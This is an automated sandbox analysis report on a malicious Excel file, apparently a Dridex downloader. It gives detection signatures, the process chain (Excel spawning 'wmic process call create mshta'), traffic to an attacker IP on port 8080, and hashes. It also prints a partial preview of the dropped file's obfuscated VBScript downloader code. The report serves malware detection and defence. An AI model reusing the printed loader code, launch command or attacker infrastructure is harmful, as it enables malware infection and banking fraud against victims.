Loading ...

Play interactive tourEdit tour

Windows Analysis Report Sale-8799306.xlsb

Overview

General Information

Sample Name:Sale-8799306.xlsb
Analysis ID:528366
MD5:48a10cd89790785f31ebcfc2e1c96ee3
SHA1:bea251b714aefa43254dd9b252aeb04baf126041
SHA256:14ee8fe1b5df73dac77e228d5799595799cd07d9d0ed4ecb61247353d8241f72
Tags:Dridexxlsbxlsx
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex Downloader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Dridex Downloader
Multi AV Scanner detection for submitted file
Found malicious Excel 4.0 Macro
Creates and opens a fake document (probably a fake document to hide exploiting)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document exploit detected (process start blacklist hit)
Creates processes via WMI
Document exploit detected (UrlDownloadToFile)
Found protected and hidden Excel 4.0 Macro sheet
Contains functionality to create processes via WMI
Found obfuscated Excel 4.0 Macro
Queries the volume information (name, serial number etc) of a device
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
May sleep (evasive loops) to hinder dynamic analysis
Yara detected Xls With Macro 4.0
Detected TCP or UDP traffic on non-standard ports
Sigma detected: Suspicious WMI Execution
Creates a window with clipboard capturing capabilities
IP address seen in connection with other malware

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2652 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WMIC.exe (PID: 2832 cmdline: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf" MD5: FD902835DEAEF4091799287736F3A028)
  • mshta.exe (PID: 1320 cmdline: mshta C:\ProgramData\CjBEfxIRZH.rtf MD5: 95828D670CFD3B16EE188168E083C3C5)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\ProgramData\CjBEfxIRZH.rtfJoeSecurity_DridexDownloaderYara detected Dridex DownloaderJoe Security

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", ProcessId: 2832
      Sigma detected: Suspicious WMI ExecutionShow sources
      Source: Process startedAuthor: Michael Haag, Florian Roth, juju4, oscd.community: Data: Command: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", CommandLine: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2652, ProcessCommandLine: wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf", ProcessId: 2832

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Multi AV Scanner detection for submitted fileShow sources
      Source: Sale-8799306.xlsbVirustotal: Detection: 9%Perma Link
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Software Vulnerabilities:

      barindex
      Document exploit detected (process start blacklist hit)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe
      Document exploit detected (UrlDownloadToFile)Show sources
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.181.174:8080
      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 136.144.181.174:8080
      Source: Joe Sandbox ViewIP Address: 136.144.181.174 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: unknownTCP traffic detected without corresponding DNS query: 136.144.181.174
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
      Source: mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
      Source: mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
      Source: mshta.exe, 00000005.00000002.660948514.0000000004020000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
      Source: WMIC.exe, 00000002.00000002.444141193.0000000001AA0000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
      Source: mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
      Source: mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
      Source: mshta.exe, 00000005.00000002.660948514.0000000004020000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
      Source: mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55A75020.pngJump to behavior
      Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

      E-Banking Fraud:

      barindex
      Yara detected Dridex DownloaderShow sources
      Source: Yara matchFile source: C:\ProgramData\CjBEfxIRZH.rtf, type: DROPPED

      System Summary:

      barindex
      Found malicious Excel 4.0 MacroShow sources
      Source: Sale-8799306.xlsbMacro extractor: Sheet: Macro1 contains: urlmon
      Found Excel 4.0 Macro with suspicious formulasShow sources
      Source: Sale-8799306.xlsbInitial sample: EXEC
      Found protected and hidden Excel 4.0 Macro sheetShow sources
      Source: Sale-8799306.xlsbInitial sample: Sheet name: Macro1
      Contains functionality to create processes via WMIShow sources
      Source: WMIC.exe, 00000002.00000002.444038183.0000000000160000.00000004.00000020.sdmpBinary or memory string: C:\Users\user\Documents\C:\Windows\System32\Wbem;;C:\Windows\system32;C:\Windows\system;C:\Windows;.;C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\C:\Windows\System32\Wbem\wmic.exewmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf"C:\Windows\System32\Wbem\wmic.exeWinSta0\Default
      Found obfuscated Excel 4.0 MacroShow sources
      Source: Sale-8799306.xlsbMacro extractor: Sheet: Macro1 high usage of CHAR() function: 58
      Source: Sale-8799306.xlsbMacro extractor: Sheet name: Macro1
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
      Source: Sale-8799306.xlsbVirustotal: Detection: 9%
      Source: C:\Windows\System32\wbem\WMIC.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf"
      Source: unknownProcess created: C:\Windows\System32\mshta.exe mshta C:\ProgramData\CjBEfxIRZH.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\wbem\WMIC.exe wmic process call create "mshta C:\ProgramData\CjBEfxIRZH.rtf"Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create
      Source: mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Sale-8799306.xlsbJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD0E.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSB@4/4@0/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: Sale-8799306.xlsbInitial sample: OLE zip file path = xl/media/image2.png
      Source: Sale-8799306.xlsbInitial sample: OLE zip file path = xl/media/image1.png
      Source: Sale-8799306.xlsbInitial sample: OLE zip file path = docProps/custom.xml
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

      Persistence and Installation Behavior:

      barindex
      Creates processes via WMIShow sources
      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Creates and opens a fake document (probably a fake document to hide exploiting)Show sources
      Source: unknownProcess created: cmd line: cjbefxirzh.rtf
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: cmd line: cjbefxirzh.rtfJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exe TID: 2412Thread sleep time: -180000s >= -30000sJump to behavior
      Source: C:\Windows\System32\mshta.exe TID: 2224Thread sleep time: -60000s >= -30000sJump to behavior
      Source: Yara matchFile source: app.xml, type: SAMPLE
      Source: mshta.exe, 00000005.00000002.660266814.0000000001610000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: mshta.exe, 00000005.00000002.660266814.0000000001610000.00000002.00020000.sdmpBinary or memory string: !Progman
      Source: mshta.exe, 00000005.00000002.660266814.0000000001610000.00000002.00020000.sdmpBinary or memory string: Program Manager<
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
      Source: C:\Windows\System32\wbem\WMIC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation21Path InterceptionProcess Injection2Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumNon-Standard Port1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting4Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion1LSASS MemoryProcess Discovery1Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsExploitation for Client Execution31Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting4NTDSSystem Information Discovery15Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Sale-8799306.xlsb10%VirustotalBrowse

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.%s.comPA0%URL Reputationsafe
      http://www.icra.org/vocabulary/.0%URL Reputationsafe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
      http://servername/isapibackend.dll0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkmshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpfalse
        high
        http://www.windows.com/pctv.mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpfalse
          high
          http://investor.msn.commshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtmshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpfalse
              high
              http://www.%s.comPAmshta.exe, 00000005.00000002.660948514.0000000004020000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              low
              http://www.icra.org/vocabulary/.mshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.mshta.exe, 00000005.00000002.660948514.0000000004020000.00000002.00020000.sdmpfalse
                high
                http://windowsmedia.com/redir/services.asp?WMPFriendly=truemshta.exe, 00000005.00000002.660796365.0000000003BD7000.00000002.00020000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.hotmail.com/oemshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpfalse
                  high
                  http://servername/isapibackend.dllWMIC.exe, 00000002.00000002.444141193.0000000001AA0000.00000002.00020000.sdmpfalse
                  • Avira URL Cloud: safe
                  low
                  http://investor.msn.com/mshta.exe, 00000005.00000002.660649700.00000000039F0000.00000002.00020000.sdmpfalse
                    high

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    136.144.181.174
                    unknownNetherlands
                    20857TRANSIP-ASAmsterdamtheNetherlandsNLfalse

                    General Information

                    Joe Sandbox Version:34.0.0 Boulder Opal
                    Analysis ID:528366
                    Start date:25.11.2021
                    Start time:06:25:37
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 4m 47s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:Sale-8799306.xlsb
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.expl.evad.winXLSB@4/4@0/1
                    EGA Information:Failed
                    HDC Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    • Found application associated with file extension: .xlsb
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active AutoShape Object
                    • Active Picture Object
                    • Active Picture Object
                    • Scroll down
                    • Close Viewer
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtSetInformationFile calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    06:27:35API Interceptor11x Sleep call for process: WMIC.exe modified
                    06:27:36API Interceptor457x Sleep call for process: mshta.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    136.144.181.17403332955311591163552.xlsbGet hashmaliciousBrowse
                      license517502.xlsbGet hashmaliciousBrowse
                        03332955311591163552.xlsbGet hashmaliciousBrowse
                          license517502.xlsbGet hashmaliciousBrowse
                            942830.xlsbGet hashmaliciousBrowse
                              promo code83874071.xlsbGet hashmaliciousBrowse
                                promo code83874071.xlsbGet hashmaliciousBrowse
                                  vote number3210109.xlsbGet hashmaliciousBrowse
                                    tax77567960.xlsbGet hashmaliciousBrowse
                                      hunting license-25331.xlsbGet hashmaliciousBrowse
                                        vote number3210109.xlsbGet hashmaliciousBrowse
                                          tax77567960.xlsbGet hashmaliciousBrowse
                                            subscription-84799.xlsbGet hashmaliciousBrowse
                                              hunting license-25331.xlsbGet hashmaliciousBrowse
                                                subscription-84799.xlsbGet hashmaliciousBrowse
                                                  8993268.xlsbGet hashmaliciousBrowse
                                                    promo 2352017.xlsbGet hashmaliciousBrowse
                                                      8993268.xlsbGet hashmaliciousBrowse
                                                        promo 2352017.xlsbGet hashmaliciousBrowse
                                                          Offer 373466695.xlsbGet hashmaliciousBrowse

                                                            Domains

                                                            No context

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            TRANSIP-ASAmsterdamtheNetherlandsNL03332955311591163552.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            license517502.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            03332955311591163552.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            license517502.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            942830.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            promo code83874071.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            promo code83874071.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            vote number3210109.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            tax77567960.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            hunting license-25331.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            vote number3210109.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            tax77567960.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            subscription-84799.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            hunting license-25331.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            subscription-84799.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            8993268.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            promo 2352017.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            8993268.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            promo 2352017.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174
                                                            Offer 373466695.xlsbGet hashmaliciousBrowse
                                                            • 136.144.181.174

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\ProgramData\CjBEfxIRZH.rtf
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):4740
                                                            Entropy (8bit):5.0867190835957645
                                                            Encrypted:false
                                                            SSDEEP:96:8nYFjL2K+uwyUxis2YpY5odxxDyHfpl4I+KBB3:8nYFjL2K+u+osfhxob4IZBB3
                                                            MD5:1D00A0BA4888BC1436F1BC9EA0B5E2F8
                                                            SHA1:A306A36868D6FDD730E1009459F6DDADBE55229D
                                                            SHA-256:A9F2171A7A232FFFF0FBA8512C7479EED718C839A1E0936F26BEB52A6F722741
                                                            SHA-512:B7E2387BA7DBB7086D530653EB6654264199BE50BED7F88D0D722953EEB8E37055338EF3A67A4B049D6BAC65E3A05F9CCCCA66D91AE8BDCAA6AF328F90A75B76
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\CjBEfxIRZH.rtf, Author: Joe Security
                                                            Reputation:low
                                                            Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >..s_U_w_o_s_g_X_b_m_O_t_V_W_A = "ru" & "ndl" & Chr(108+1-1) & "32" & ".ex" & "e " & "" & "" & "C:" & "" & Chr(92+1-1) & "\Pr" & "og" & "ra" & "" & "mD" & Chr(97+1-1) & "ta\" & "qy" & "xni" & Chr(103+1-1) & "ger" & Chr(46+1-1) & "bin" & " W" & Chr(115+1-1) & Chr(112+1-1) & "Fr" & "" & "ee" & Chr(83+1-1) & "" & "tri" & Chr(110+1-1) & Chr(103+1-1)..Set N_u_t_P_L_z_U_D_U_J_q_a_i_k = CreateObject("" & "MSX" & "" & "ML2" & Chr(46+1-1) & Chr(83+1-1) & "" & Chr(101+1-1) & "" & Chr(114+1-1) & Chr(118+1-1) & "er" & Chr(88+1-1) & Chr(77+1-1) & Chr(76+1-1) & "HT" & "TP" & ".6." & Chr(48+1-1))....U_p_E_s_j_U_w = "" & "" & "Wsc" & "ri" & Chr(112+1-1) & Chr(116+1-1) & ".S" & "hel" & "" & Chr(108+1-1)..Set r_S_A_N_M_B_e_g_F_o_E_b = CreateObject(U_p_E_s_j_U_w
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55A75020.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 275 x 49, 8-bit/color RGB, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):2606
                                                            Entropy (8bit):7.891909984788504
                                                            Encrypted:false
                                                            SSDEEP:48:TausXWVTts/Q6Jk9/k4TdbhxIEixdrN79Qe/138rVaFnyuGi4xHcyxS/nXn:TausXU5szI/XpYZpp/qr4UmE8B/nXn
                                                            MD5:5DFFDD2FB65CF32169E7DD1D0EA78D9A
                                                            SHA1:9D3AC86B74C7A5E203530509F630AE577178DD4C
                                                            SHA-256:4C38C0E3A308F116C826D88F2B04C094DC5BC26936F621DE3169C8AB0E2C4AB0
                                                            SHA-512:B604C65C8E19813DCA18BECC55478BF9C8359403D3C3CA2D0B00E15666F40398E5B0970B541CADDC2A96DD7BDD48B5A24FDCF317AFE8B8CC3241AE7B93A48B0D
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview: .PNG........IHDR.......1.....v..f....IDATx..{PT...{wy.....E^>@..B.A..I.$6i..L.4j.G.I...h&.MF.16..c.iM.D."...K..F]@....X`a.W.8.nv...(.v~..3.{........3..>... .....A<..r...R.A.@.!..H9...). x ..........C.<.r...R.A.@.!..H9...). x ..........C.<.r....=.q...~q......ni6.g..yl.L.^/?r0..,.......M-...r../.......O.].....4.7:.@...b.......o\8...'..jtL.....w.z.w)[k.....(5VH_...1...^U{...W_......C.........r........#P.......K1.-...E..2.g.n.b..~*=yx..A.._.n....s2T.[....._..=`...y8e..?...vEYI..k-.0.,.i....-....gN].!V....v........l..])*.X.'r.+8.p...U..K`..O.{@ .&.%.2y.....|.m.. ..zy..2...../Xw,.9.....P._.......H.......m..............6\...............UT.B........u..?[..D..3.....UkD.8(5...2..|.......__>._....9.@^V&[..yY...^V..R.5.V..z......LI..bf...0p5.....fJ.#s...Q//...........k.A..EK.._..9hZ?/+...M.>m._.D.}..G....L. ..u..2..e....[..u.E@$.ik..|.<..)xq. ......._..x}M.".:..|.....xZz.OHJ..-. .T..nn,>...{.....Y..t.../......l......$queF.......#..J............v.
                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D68BD1A1.png
                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                            File Type:PNG image data, 225 x 317, 8-bit/color RGBA, non-interlaced
                                                            Category:dropped
                                                            Size (bytes):23263
                                                            Entropy (8bit):7.9518461176343935
                                                            Encrypted:false
                                                            SSDEEP:384:7BPzUfBYeljb/VAmN8JSEuPQeC2BnPn6W2Z53nSAPaWbkmB3o33uyNC5GeYRZ:tPiDbzNLo6CW2Z53SAPaWbpi3H
                                                            MD5:EAD24DFF12A96B9755CAE3F750CE31F3
                                                            SHA1:2B56BB5624033059718BBD82CE8859D02DB2F38C
